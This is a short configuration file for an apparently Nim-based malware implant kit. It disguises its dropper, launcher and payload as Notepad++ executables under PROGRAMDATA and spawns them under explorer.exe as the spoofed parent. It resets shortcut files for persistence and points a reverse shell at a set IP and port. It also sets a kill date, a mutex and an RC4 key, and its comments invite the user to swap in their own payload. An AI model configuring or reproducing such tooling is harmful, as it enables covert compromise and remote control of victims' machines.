[paths]
# Paths must start with an environment variable
# Files need to be in unique directories
launcher_path = '"PROGRAMDATA"\\Notepad++\\uninstall'
payload_path = '"PROGRAMDATA"\\Notepad++\\updater'

[timers]
# The amount of time to wait before resetting lnks
reset_time = "50" # 50 seconds

[bin_names]
# Change these to whatever
# If using your own payload, make sure the bin name matches here
launcher = "uninstall.exe"
payload = "GUP.exe" 
dropper = "notepad++.exe"

[parent_process]
# Parent PID to spawn processes under
parent_proc = "explorer.exe"

[connect]
# If using rev_shell.nim
ip_addr = "10.0.0.5"
port = "1234"

[kill_date]
# Self removal at or after this date
kill_date = "2049-01-01"

[mutex]
name = "Global\\KoolMutexx"

[key]
rc4_key = "rcforever"